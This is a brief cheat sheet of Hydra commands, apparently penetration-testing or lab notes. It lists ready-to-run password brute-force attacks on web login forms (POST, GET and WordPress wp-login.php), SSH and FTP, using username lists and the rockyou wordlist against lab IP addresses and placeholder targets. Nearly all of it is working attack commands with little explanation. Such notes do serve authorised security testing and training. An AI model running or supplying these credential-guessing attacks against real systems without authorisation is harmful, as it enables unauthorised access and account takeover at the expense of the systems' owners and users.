# hydra - brute Force Attack Tool

# Web Application - HTTP POST

Simple web form using HTTP and POST data

hydra -L users.txt -P rockyou.txt 10.200.157.232 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v

# Web Application - HTTP GET

hydra -L users.txt -P passwords.txt 10.200.217.232 http-get /admin

# Web WordPress

hydra -l <USER> -P ./passwordlist.txt <IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:F=ERROR'

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt www.exemple.com -t 5 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:F=ERROR'

# SSH

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u <IP> ssh

# FTP

hydra -L <PATH-USERNAMES> -P <PATH-PASSWD> 192.168.100.131 ftp